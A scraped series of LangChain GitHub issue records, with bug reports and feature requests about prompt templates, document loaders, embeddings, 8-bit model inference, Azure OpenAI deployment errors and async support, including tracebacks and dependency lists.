- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
import os
os.environ["OPENAI_API_KEY"] = "..."
from langchain.chains import LLMChain
from langchain.chat_models import ChatOpenAI
from langchain.prompts import PromptTemplate
from langchain.prompts.chat import ChatPromptTemplate
from langchain.schema import messages_from_dict
role_strings = [
("system", "you are a bird expert"),
("human", "which bird has a point beak?")
]
prompt = ChatPromptTemplate.from_role_strings(role_strings)
chain = LLMChain(llm=ChatOpenAI(), prompt=prompt)
chain.run({})
```
### Expected behavior
Chain should run | ChatOpenAI models don't work with prompts created via ChatPromptTemplate.from_role_strings | https://api.github.com/repos/langchain-ai/langchain/issues/5027/comments | 1 | 2023-05-20T10:39:18Z | 2023-05-30T20:56:20Z | https://github.com/langchain-ai/langchain/issues/5027 | 1,718,131,410 | 5,027 |
[
"hwchase17",
"langchain"
]
| ### Feature request
A utility to cleanup documents or texts after loading into langchain document formats. The LLMs sometime even consider redundant whitespaces in the context as tokens leading to wastage of tokens. What I'm proposing is an utility that binds with the existing adapters in langchain and/or llama-index that cleans up documents (getting read of whitespaces, getting rid of special characters, restructuring it in a readable, yet cost efficient format etc.) all while keeping the LLMs readability of the document in mind. The user should be able to choose what kind of a cleanup they want.
### Motivation
I was having a trouble with whitespaces in the project that I'm building with langchain where it lead to high consumption of tokens. I tried to find some utility either in langchain or in llama-index that I could use right out of the box for this and was not able to find one.
### Your contribution
I could help build this feature, If I have some instructions (Dos and donts) | Document Cleanup Tools | https://api.github.com/repos/langchain-ai/langchain/issues/5026/comments | 1 | 2023-05-20T10:36:52Z | 2023-09-19T16:09:56Z | https://github.com/langchain-ai/langchain/issues/5026 | 1,718,130,806 | 5,026 |
[
"hwchase17",
"langchain"
]
| ### System Info
I am using version `0.0.171` of Langchain.
Running a mac, M1, 2021, OS Ventura. Can do most all of Langchain operations without errors.
Except for this issue. Installed through pyenv, python 3.11.
```requirements.txt
aiohttp==3.8.4
aiosignal==1.3.1
anyio==3.6.2
appnope==0.1.3
argilla==1.7.0
argon2-cffi==21.3.0
argon2-cffi-bindings==21.2.0
arrow==1.2.3
asttokens==2.2.1
async-timeout==4.0.2
attrs==23.1.0
backcall==0.2.0
backoff==2.2.1
beautifulsoup4==4.12.2
-e git+ssh://[email protected]/mad-start/big-macs-llm.git@2998ca685b68d74ef20a12fe74c0f4cab6e48dcb#egg=big_macs_llm
bleach==6.0.0
certifi==2023.5.7
cffi==1.15.1
charset-normalizer==3.1.0
click==8.1.3
comm==0.1.3
commonmark==0.9.1
contourpy==1.0.7
cryptography==40.0.2
cycler==0.11.0
dataclasses-json==0.5.7
datasets==2.12.0
debugpy==1.6.7
decorator==5.1.1
defusedxml==0.7.1
Deprecated==1.2.13
dill==0.3.6
einops==0.6.1
et-xmlfile==1.1.0
executing==1.2.0
fastjsonschema==2.16.3
filelock==3.12.0
fonttools==4.39.4
fqdn==1.5.1
frozenlist==1.3.3
fsspec==2023.5.0
h11==0.14.0
httpcore==0.16.3
httpx==0.23.3
huggingface-hub==0.14.1
idna==3.4
iniconfig==2.0.0
ipykernel==6.23.1
ipython==8.13.2
ipython-genutils==0.2.0
ipywidgets==8.0.6
isoduration==20.11.0
jedi==0.18.2
Jinja2==3.1.2
joblib==1.2.0
jsonpointer==2.3
jsonschema==4.17.3
jupyter==1.0.0
jupyter-console==6.6.3
jupyter-events==0.6.3
jupyter_client==8.2.0
jupyter_core==5.3.0
jupyter_server==2.5.0
jupyter_server_terminals==0.4.4
jupyterlab-pygments==0.2.2
jupyterlab-widgets==3.0.7
kiwisolver==1.4.4
langchain==0.0.171
lxml==4.9.2
Markdown==3.4.3
MarkupSafe==2.1.2
marshmallow==3.19.0
marshmallow-enum==1.5.1
matplotlib==3.7.1
matplotlib-inline==0.1.6
mistune==2.0.5
monotonic==1.6
mpmath==1.3.0
msg-parser==1.2.0
multidict==6.0.4
multiprocess==0.70.14
mypy-extensions==1.0.0
nbclassic==1.0.0
nbclient==0.7.4
nbconvert==7.4.0
nbformat==5.8.0
nest-asyncio==1.5.6
networkx==3.1
nltk==3.8.1
notebook==6.5.4
notebook_shim==0.2.3
numexpr==2.8.4
numpy==1.23.5
olefile==0.46
openai==0.27.6
openapi-schema-pydantic==1.2.4
openpyxl==3.1.2
packaging==23.1
pandas==1.5.3
pandocfilters==1.5.0
parso==0.8.3
pdf2image==1.16.3
pdfminer.six==20221105
pexpect==4.8.0
pickleshare==0.7.5
Pillow==9.5.0
platformdirs==3.5.1
pluggy==1.0.0
prometheus-client==0.16.0
prompt-toolkit==3.0.38
psutil==5.9.5
ptyprocess==0.7.0
pure-eval==0.2.2
pyarrow==12.0.0
pycparser==2.21
pydantic==1.10.7
Pygments==2.15.1
pypandoc==1.11
pyparsing==3.0.9
pyrsistent==0.19.3
pytest==7.3.1
python-dateutil==2.8.2
python-docx==0.8.11
python-dotenv==1.0.0
python-json-logger==2.0.7
python-magic==0.4.27
python-pptx==0.6.21
pytz==2023.3
PyYAML==6.0
pyzmq==25.0.2
qtconsole==5.4.3
QtPy==2.3.1
regex==2023.5.5
requests==2.30.0
responses==0.18.0
rfc3339-validator==0.1.4
rfc3986==1.5.0
rfc3986-validator==0.1.1
rich==13.0.1
scikit-learn==1.2.2
scipy==1.10.1
Send2Trash==1.8.2
sentence-transformers==2.2.2
sentencepiece==0.1.99
six==1.16.0
sniffio==1.3.0
soupsieve==2.4.1
SQLAlchemy==2.0.13
stack-data==0.6.2
sympy==1.12
tabulate==0.9.0
tenacity==8.2.2
terminado==0.17.1
text-generation==0.5.2
threadpoolctl==3.1.0
tiktoken==0.4.0
tinycss2==1.2.1
tokenizers==0.13.3
torch==2.0.1
torchvision==0.15.2
tornado==6.3.2
tqdm==4.65.0
traitlets==5.9.0
transformers==4.29.2
typer==0.9.0
typing-inspect==0.8.0
typing_extensions==4.5.0
tzdata==2023.3
unstructured==0.6.8
uri-template==1.2.0
urllib3==2.0.2
wcwidth==0.2.6
webcolors==1.13
webencodings==0.5.1
websocket-client==1.5.1
widgetsnbextension==4.0.7
wrapt==1.14.1
XlsxWriter==3.1.0
xxhash==3.2.0
yarl==1.9.2
```
### Who can help?
@eyurtsev Thank you:
I got this code from [Langchain instructions here](https://python.langchain.com/en/latest/modules/indexes/document_loaders/examples/file_directory.html#change-loader-class). While I am able to load and split a python file one at a time, I cannot do so for DirectoryLoaders that have `*.py` in the glob pattern. I tested this out without langchain and it worked just fine.
```python
from langchain.document_loaders.text import TextLoader
from langchain.document_loaders.directory import DirectoryLoader
loader = DirectoryLoader('../../../src', glob="**/*.py", loader_cls=TextLoader)
directory_loader.load()
```
and
```python
from langchain.document_loaders.directory import DirectoryLoader
from langchain.document_loaders import PythonLoader
loader = DirectoryLoader('../../../../../', glob="**/*.py", loader_cls=PythonLoader)
directory_loader.load()
```
yields an error:
`ValueError: Invalid file ../../../src/my_library/__init__.py. The FileType.UNK file type is not supported in partition.`
I looked up this error on the unstructured issues page and then I ran the following code with unstructured and it didn't error out and displayed the contents of the python module.
```python
from unstructured.partition.text import partition_text
elements = partition_text(filename='setup.py')
print("\n\n".join([str(el) for el in elements]))
```
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I have written more detail above, but this can be reproduced like this.
```python
from langchain.document_loaders.directory import DirectoryLoader
from langchain.document_loaders import PythonLoader
loader = DirectoryLoader('../../../../../', glob="**/*.py", loader_cls=PythonLoader)
directory_loader.load()
```
### Expected behavior
```zsh
---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
Cell In[73], line 6
2 from langchain.document_loaders import PythonLoader
5 loader = DirectoryLoader('../../../../../', glob="**/*.py", loader_cls=PythonLoader)
----> 6 directory_loader.load()
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/langchain/document_loaders/directory.py:103, in DirectoryLoader.load(self)
101 else:
102 for i in items:
--> 103 self.load_file(i, p, docs, pbar)
105 if pbar:
106 pbar.close()
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/langchain/document_loaders/directory.py:69, in DirectoryLoader.load_file(self, item, path, docs, pbar)
67 logger.warning(e)
68 else:
---> 69 raise e
70 finally:
71 if pbar:
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/langchain/document_loaders/directory.py:63, in DirectoryLoader.load_file(self, item, path, docs, pbar)
61 if _is_visible(item.relative_to(path)) or self.load_hidden:
62 try:
---> 63 sub_docs = self.loader_cls(str(item), **self.loader_kwargs).load()
64 docs.extend(sub_docs)
65 except Exception as e:
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/langchain/document_loaders/unstructured.py:70, in UnstructuredBaseLoader.load(self)
68 def load(self) -> List[Document]:
69 """Load file."""
---> 70 elements = self._get_elements()
71 if self.mode == "elements":
72 docs: List[Document] = list()
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/langchain/document_loaders/unstructured.py:104, in UnstructuredFileLoader._get_elements(self)
101 def _get_elements(self) -> List:
102 from unstructured.partition.auto import partition
--> 104 return partition(filename=self.file_path, **self.unstructured_kwargs)
File ~/.pyenv/versions/3.11.3/envs/big-macs-llm/lib/python3.11/site-packages/unstructured/partition/auto.py:206, in partition(filename, content_type, file, file_filename, url, include_page_breaks, strategy, encoding, paragraph_grouper, headers, ssl_verify, ocr_languages, pdf_infer_table_structure, xml_keep_tags)
204 else:
205 msg = "Invalid file" if not filename else f"Invalid file {filename}"
--> 206 raise ValueError(f"{msg}. The {filetype} file type is not supported in partition.")
208 for element in elements:
209 element.metadata.url = url
ValueError: Invalid file ../../../src/__init__.py. The FileType.UNK file type is not supported in partition.
``` | Cannot load python files for Directory Loader | https://api.github.com/repos/langchain-ai/langchain/issues/5025/comments | 1 | 2023-05-20T09:48:56Z | 2023-09-10T16:14:45Z | https://github.com/langchain-ai/langchain/issues/5025 | 1,718,119,181 | 5,025 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: 0.0.173
numpy version: 1.24.3
### Related Components
- [X] Embedding Models
### Reproduction
```python
from sentence_transformers import SentenceTransformer
import numpy as np
from langchain.embeddings import HuggingFaceEmbeddings
t = 'langchain embedding'
m = HuggingFaceEmbeddings(encode_kwargs={"normalize_embeddings": True})
# SentenceTransformer embeddings with unit norm
x = SentenceTransformer(m.model_name).encode(t, normalize_embeddings=True)
# Langchain.Huggingface embeddings with unit norm
y = m.embed_query(t)
print(f'L2 norm of SentenceTransformer: {np.linalg.norm(x)}. \nL2 norm of Langchain.Huggingface: {np.linalg.norm(y)}')
```
### Expected behavior
Both of these two L2 norm results shoud be 1. But I got as blow:
```
L2 norm of SentenceTransformer: 1.0.
L2 norm of Langchain.Huggingface: 1.0000000445724682
```
I think the problem came from this [code](https://github.com/hwchase17/langchain/blob/27e63b977aa07cb4ccb25b006c9af17310a9f530/langchain/embeddings/huggingface.py#LL87C34-L87C34). When converting array to list, the numbers got bigger | Precision of HuggingFaceEmbeddings.embed_query changes | https://api.github.com/repos/langchain-ai/langchain/issues/5024/comments | 2 | 2023-05-20T08:44:51Z | 2023-09-10T16:14:51Z | https://github.com/langchain-ai/langchain/issues/5024 | 1,718,103,064 | 5,024 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to query databases with multiple tables. Because of DB metadata, the prompt length exceeds the max token limit of 4000 of OpenAI . Do you have any ideas on how to solve this problem for databases with medium to large metadata? I have tried it for Postgrsql and Presto.
`InvalidRequestError: This model's maximum context length is 4097 tokens, however you requested 4995 tokens (4739 in your prompt; 256 for the completion). Please reduce your prompt; or completion length.`
### Suggestion:
_No response_ | SQL database with metadata exceeding 4000 token limit of Open AI. | https://api.github.com/repos/langchain-ai/langchain/issues/5023/comments | 1 | 2023-05-20T08:26:04Z | 2023-05-20T08:30:26Z | https://github.com/langchain-ai/langchain/issues/5023 | 1,718,098,699 | 5,023 |
[
"hwchase17",
"langchain"
]
| ### Feature request
i have using RWKV llm with langchian and everything is ok,
but i don't know how to rewrite `_call` for add lora for my own RWKV Model, can you give some tips
### Motivation
-
### Your contribution
- | How to add lora for RWKV in using langchian | https://api.github.com/repos/langchain-ai/langchain/issues/5022/comments | 1 | 2023-05-20T08:12:51Z | 2023-09-10T16:14:57Z | https://github.com/langchain-ai/langchain/issues/5022 | 1,718,095,658 | 5,022 |
[
"hwchase17",
"langchain"
]
|
I was trying to use `gpt-3.5` family for models as a proxy for codex to generate code.
I tried using `PromptTemplate` and `PydanticOutputParser` parser to get code output. But turns out the LLM mixes up the Prompt template example in the response
**Parser**
```python
class CodeCompletion(BaseModel):
code: str = Field(description="completed code")
parser = PydanticOutputParser(pydantic_object=CodeCompletion)
```
**Prompt Template**
```python
template = """
I want you to act as an Code Assistant bot. please complete the following code written in {programming_language} programming language
{code}
Format the response in {format_instructions}
"""
code_completion_prompt = PromptTemplate(
input_variables=["programming_language", "code"],
partial_variables={"format_instructions": parser.get_format_instructions()},
template=template,
)
```
**Prompt (generated by prompt template)**
```
I want you to act as an Code Assistant bot. please complete the following code written in python programming language
# Write a function to read json data from s3
def read_from_s3():
pass
Format the response in The output should be formatted as a JSON instance that conforms to the JSON schema below.
As an example, for the schema {"properties": {"foo": {"title": "Foo", "description": "a list of strings", "type": "array", "items": {"type": "string"}}}, "required": ["foo"]}}
the object {"foo": ["bar", "baz"]} is a well-formatted instance of the schema. The object {"properties": {"foo": ["bar", "baz"]}} is not well-formatted.
Here is the output schema:
\```
{"properties": {"code": {"title": "Code", "description": "completed code", "type": "string"}}, "required": ["code"]}
\```
```
**Output from LLM**
``` File "/Users/avikant/Projects/HackerGPT-backend/venv/lib/python3.11/site-packages/langchain/output_parsers/pydantic.py", line 31, in parse
raise OutputParserException(msg)
langchain.schema.OutputParserException: Failed to parse CodeCompletion from completion # Write a function to read json data from s3
import json
def read_from_s3(file_path):
with open(file_path, 'r') as f:
data = json.load(f)
return {"code": data}
response = read_from_s3("s3://path/to/file.json")
print(json.dumps(response)) # outputs {"code": {<data from file.json>}} in JSON format.. Got: Expecting value: line 1 column 10 (char 9)
```
### Suggestion:
A way to parse the code generation output | Issue: Prompt template does not work with Code related queries | https://api.github.com/repos/langchain-ai/langchain/issues/5020/comments | 2 | 2023-05-20T07:22:06Z | 2023-09-15T22:12:59Z | https://github.com/langchain-ai/langchain/issues/5020 | 1,718,084,155 | 5,020 |
[
"hwchase17",
"langchain"
]
| ### System Info
Python Version = 3.10
Langchain Version = 0.0.174
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
Good evening,
I have been working on my own custom wrapper for a Huggingface model. I am using a custom wrapper as a plan to add additional features such as LoRA finetuning. I have loaded the model in 8 bit and received the error "topk_cpu" not implemented for 'Half'. This led me to conclude 8 bit models are currently not supported for inference inside Langchain, though I am unsure if this is due to the library or faulty code on my end.
The code for the model is as follows:
#Langchain Imports
from typing import Any, List, Mapping, Optional
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import LLM
#Huggingface Inputs
import os
os.environ["CUDA_VISIBLE_DEVICES"]="0"
import torch
import torch.nn as nn
import bitsandbytes as bnb
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM
#Pydantic imports
from pydantic import BaseModel, Field
class HuggingFaceLLM(LLM):
model_name: str = Field(default="facebook/opt-6.7b")
tokenizer: AutoTokenizer = Field(default=None)
model: AutoModelForCausalLM = Field(default=None)
device: torch.device = Field(default=None)
def __init__(self, model_name="facebook/opt-6.7b"):
super().__init__()
self.tokenizer = AutoTokenizer.from_pretrained(model_name)
self.model = AutoModelForCausalLM.from_pretrained(model_name, load_in_8bit=True, device_map='auto')
#self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
#self.model.to(self.device)
@property
def _llm_type(self) -> str:
return "huggingface"
def _call(
self,
prompt: str,
temperature: float = 1.0,
max_tokens: int = 512,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
) -> str:
if stop is not None:
raise ValueError("stop kwargs are not permitted.")
# prepare input data
input_ids = self.tokenizer.encode(prompt, return_tensors='pt')
# generate text
gen_tokens = self.model.generate(
input_ids,
do_sample=True,
temperature=temperature,
max_length=max_tokens,
)
# decode generated text
gen_text = self.tokenizer.decode(gen_tokens[:, input_ids.shape[-1]:][0], skip_special_tokens=True)
return gen_text
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {"model_name": self.model.config._name_or_path}
#Build model
llm = HuggingFaceLLM("facebook/opt-6.7b")
#Inference
llm("What is the fastest car")
---------------------------------------------------------------------------------------------------------------------------------------------
The traceback is here as follows:
╭─────────────────────────────── Traceback (most recent call last) ────────────────────────────────╮
│ in <module>:1 │
│ │
│ ❱ 1 llm("What is the fastest car") │
│ 2 │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/langchain/llms/base │
│ .py:291 in __call__ │
│ │
│ 288 │ ) -> str: │
│ 289 │ │ """Check Cache and run the LLM on the given prompt and input.""" │
│ 290 │ │ return ( │
│ ❱ 291 │ │ │ self.generate([prompt], stop=stop, callbacks=callbacks) │
│ 292 │ │ │ .generations[0][0] │
│ 293 │ │ │ .text │
│ 294 │ │ ) │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/langchain/llms/base │
│ .py:191 in generate │
│ │
│ 188 │ │ │ │ ) │
│ 189 │ │ │ except (KeyboardInterrupt, Exception) as e: │
│ 190 │ │ │ │ run_manager.on_llm_error(e) │
│ ❱ 191 │ │ │ │ raise e │
│ 192 │ │ │ run_manager.on_llm_end(output) │
│ 193 │ │ │ return output │
│ 194 │ │ if len(missing_prompts) > 0: │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/langchain/llms/base │
│ .py:185 in generate │
│ │
│ 182 │ │ │ ) │
│ 183 │ │ │ try: │
│ 184 │ │ │ │ output = ( │
│ ❱ 185 │ │ │ │ │ self._generate(prompts, stop=stop, run_manager=run_manager) │
│ 186 │ │ │ │ │ if new_arg_supported │
│ 187 │ │ │ │ │ else self._generate(prompts, stop=stop) │
│ 188 │ │ │ │ ) │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/langchain/llms/base │
│ .py:405 in _generate │
│ │
│ 402 │ │ new_arg_supported = inspect.signature(self._call).parameters.get("run_manager") │
│ 403 │ │ for prompt in prompts: │
│ 404 │ │ │ text = ( │
│ ❱ 405 │ │ │ │ self._call(prompt, stop=stop, run_manager=run_manager) │
│ 406 │ │ │ │ if new_arg_supported │
│ 407 │ │ │ │ else self._call(prompt, stop=stop) │
│ 408 │ │ │ ) │
│ │
│ in _call:33 │
│ │
│ 30 │ │ input_ids = self.tokenizer.encode(prompt, return_tensors='pt') │
│ 31 │ │ │
│ 32 │ │ # generate text │
│ ❱ 33 │ │ gen_tokens = self.model.generate( │
│ 34 │ │ │ input_ids, │
│ 35 │ │ │ do_sample=True, │
│ 36 │ │ │ temperature=temperature, │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/torch/utils/_contex │
│ tlib.py:115 in decorate_context │
│ │
│ 112 │ @functools.wraps(func) │
│ 113 │ def decorate_context(*args, **kwargs): │
│ 114 │ │ with ctx_factory(): │
│ ❱ 115 │ │ │ return func(*args, **kwargs) │
│ 116 │ │
│ 117 │ return decorate_context │
│ 118 │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/transformers/genera │
│ tion/utils.py:1565 in generate │
│ │
│ 1562 │ │ │ ) │
│ 1563 │ │ │ │
│ 1564 │ │ │ # 13. run sample │
│ ❱ 1565 │ │ │ return self.sample( │
│ 1566 │ │ │ │ input_ids, │
│ 1567 │ │ │ │ logits_processor=logits_processor, │
│ 1568 │ │ │ │ logits_warper=logits_warper, │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/transformers/genera │
│ tion/utils.py:2626 in sample │
│ │
│ 2623 │ │ │ │
│ 2624 │ │ │ # pre-process distribution │
│ 2625 │ │ │ next_token_scores = logits_processor(input_ids, next_token_logits) │
│ ❱ 2626 │ │ │ next_token_scores = logits_warper(input_ids, next_token_scores) │
│ 2627 │ │ │ │
│ 2628 │ │ │ # Store scores, attentions and hidden_states when required │
│ 2629 │ │ │ if return_dict_in_generate: │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/transformers/genera │
│ tion/logits_process.py:92 in __call__ │
│ │
│ 89 │ │ │ │ │ ) │
│ 90 │ │ │ │ scores = processor(input_ids, scores, **kwargs) │
│ 91 │ │ │ else: │
│ ❱ 92 │ │ │ │ scores = processor(input_ids, scores) │
│ 93 │ │ return scores │
│ 94 │
│ 95 │
│ │
│ /home/username/anaconda3/envs/langchainenv/lib/python3.10/site-packages/transformers/genera │
│ tion/logits_process.py:302 in __call__ │
│ │
│ 299 │ def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor) -> torch. │
│ 300 │ │ top_k = min(self.top_k, scores.size(-1)) # Safety check │
│ 301 │ │ # Remove all tokens with a probability less than the last token of the top-k │
│ ❱ 302 │ │ indices_to_remove = scores < torch.topk(scores, top_k)[0][..., -1, None] │
│ 303 │ │ scores = scores.masked_fill(indices_to_remove, self.filter_value) │
│ 304 │ │ return scores │
│ 305 │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯
RuntimeError: "topk_cpu" not implemented for 'Half'
### Expected behavior
As mentioned earlier, I am not sure if 8 bit precision is supported for inference inside Langchain.
I would expect the inference to run as expected. When the model was loaded in full 16 bit precision the inference worked successfully.
| Text Generation on an 8 bit model. | https://api.github.com/repos/langchain-ai/langchain/issues/5019/comments | 2 | 2023-05-20T05:49:32Z | 2023-05-21T20:58:06Z | https://github.com/langchain-ai/langchain/issues/5019 | 1,718,062,726 | 5,019 |
[
"hwchase17",
"langchain"
]
| ### RetrievalQA chain with GPT4All takes an extremely long time to run (doesn't end)
I encounter massive runtimes when [running a RetrievalQA chain](https://python.langchain.com/en/latest/modules/chains/index_examples/vector_db_qa.html) with a locally downloaded GPT4All LLM. Unsure what's causing this.
I pass a GPT4All model (loading [ggml-gpt4all-j-v1.3-groovy.bin](https://gpt4all.io/models/ggml-gpt4all-j-v1.3-groovy.bin) model that I downloaded locally) to the RetrievalQA Chain. I have one source text document and use sentence-transformers from HuggingFace for embeddings (I'm using a fairly small model: [all-MiniLM-L6-v2](https://www.sbert.net/docs/pretrained_models.html)).
```python
llm = GPT4All(model=model_path, n_ctx=model_n_ctx, backend='gptj', callbacks=callbacks, verbose=True)
qa = RetrievalQA.from_chain_type(llm=llm, chain_type="stuff", retriever=docsearch.as_retriever())
query = "How did the pandemic affect businesses"
ans = qa.run(query)
```
For some reason, the running the chain on a query takes an extremely long time to run (>25 minutes).
Is this due to hardware limitations or something else? I'm able to run queries directly against the GPT4All model I downloaded locally fairly quickly (like the example shown [here](https://docs.gpt4all.io/gpt4all_python.html)), which is why I'm unclear on what's causing this massive runtime.
Hardware: M1 Mac, macOS 12.1, 8 GB RAM, Python 3.10.11
### Suggestion:
_No response_ | Issue: Very long runtimes for RetrievalQA chain with GPT4All | https://api.github.com/repos/langchain-ai/langchain/issues/5016/comments | 8 | 2023-05-20T03:57:58Z | 2024-01-06T03:53:34Z | https://github.com/langchain-ai/langchain/issues/5016 | 1,718,038,199 | 5,016 |
[
"hwchase17",
"langchain"
]
| ### Feature request
None of the search tools have async support.
### Motivation
Async calls are being used langchain setup with FastAPI. Not having async support for these tools blocks there use.
### Your contribution
Happy to help out where needed. | Async Support | Search Tools | https://api.github.com/repos/langchain-ai/langchain/issues/5011/comments | 9 | 2023-05-20T01:37:04Z | 2024-06-01T00:07:30Z | https://github.com/langchain-ai/langchain/issues/5011 | 1,717,978,496 | 5,011 |
[
"hwchase17",
"langchain"
]
| ### Feature request
I have been playing around with the Plan & Execute Agent.
Would love to see async support implemented.
### Motivation
Would like to use it as a drop in agent replacement for my existing async setup.
### Your contribution
Happy to help out where needed. | Async Support | Plan & Execute | https://api.github.com/repos/langchain-ai/langchain/issues/5010/comments | 2 | 2023-05-20T01:34:11Z | 2023-09-12T16:14:29Z | https://github.com/langchain-ai/langchain/issues/5010 | 1,717,977,580 | 5,010 |
[
"hwchase17",
"langchain"
]
| ### System Info
Broken by #4915
Error: `Must provide an 'engine' or 'deployment_id' parameter to create a <class 'openai.api_resources.embedding.Embedding'>`
I'm putting a PR out to fix this now.
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Run example notebook: https://github.com/hwchase17/langchain/blob/22d844dc0795e7e53a4cc499bf4974cb83df490d/docs/modules/models/text_embedding/examples/azureopenai.ipynb
### Expected behavior
Embedding using Azure OpenAI should work. | Azure OpenAI Embeddings failed due to no deployment_id set. | https://api.github.com/repos/langchain-ai/langchain/issues/5001/comments | 2 | 2023-05-19T20:18:47Z | 2023-05-22T06:43:51Z | https://github.com/langchain-ai/langchain/issues/5001 | 1,717,774,987 | 5,001 |
[
"hwchase17",
"langchain"
]
| ### System Info
langchain==0.0.169
openai==0.27.6
### Who can help?
@hwchase17
@agola11
@vowelparrot
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.embeddings import OpenAIEmbeddings
from dotenv import load_dotenv
load_dotenv('.env')
ChatOpenAI(temperature=0, max_tokens=500, model_name='gpt-3.5-turbo', openai_api_base = os.environ['OPENAI_API_BASE'] ).call_as_llm('Hi')
### Expected behavior
[nltk_data] Downloading package stopwords to /home/sahand/nltk_data...
[nltk_data] Package stopwords is already up-to-date!
[nltk_data] Downloading package punkt to /home/sahand/nltk_data...
[nltk_data] Package punkt is already up-to-date!
Must provide an 'engine' or 'deployment_id' parameter to create a <class 'openai.api_resources.chat_completion.ChatCompletion'>
Invalid API key.
| ChatOpenAI: Must provide an 'engine' or 'deployment_id' parameter to create a <class 'openai.api_resources.chat_completion.ChatCompletion'> | https://api.github.com/repos/langchain-ai/langchain/issues/5000/comments | 19 | 2023-05-19T20:17:41Z | 2024-02-09T16:10:57Z | https://github.com/langchain-ai/langchain/issues/5000 | 1,717,773,530 | 5,000 |
[
"hwchase17",
"langchain"
]
| ### System Info
I tried using `code-davinci-002` model with LangChain, looks like it is not supported in the LLM wrapper'
```openai.error.InvalidRequestError: The model: `code-davinci-001` does not exist```
<img width="619" alt="image" src="https://github.com/hwchase17/langchain/assets/41926176/4b8bb7a7-ad4c-4618-a5f9-a8bc2a25705e">
### Who can help?
@hwchase17
@agola11
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
from langchain.llms import OpenAI
llm = OpenAI(model_name='code-davinci-002')
llm('write python code to create json object in s3')
```
### Expected behavior
The expected behaviour is that the model should load as an LLM object | code-davinci-002 does not work with LangChain | https://api.github.com/repos/langchain-ai/langchain/issues/4999/comments | 6 | 2023-05-19T20:17:35Z | 2024-01-11T12:31:46Z | https://github.com/langchain-ai/langchain/issues/4999 | 1,717,773,452 | 4,999 |
[
"hwchase17",
"langchain"
]
| ### System Info
```
from langchain.agents.agent_toolkits.openapi import planner
from langchain.llms import PromptLayerOpenAI
llm = PromptLayerOpenAI(model_name="gpt-4", temperature=0.25)
content_agent = planner.create_openapi_agent(api_spec=content_api_spec, requests_wrapper=Requests(headers = {"Authorization": f"Bearer {token}"}), llm=llm)
```
Expected that API requests are logged.
However, nothing is actually logged.
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
See code
### Expected behavior
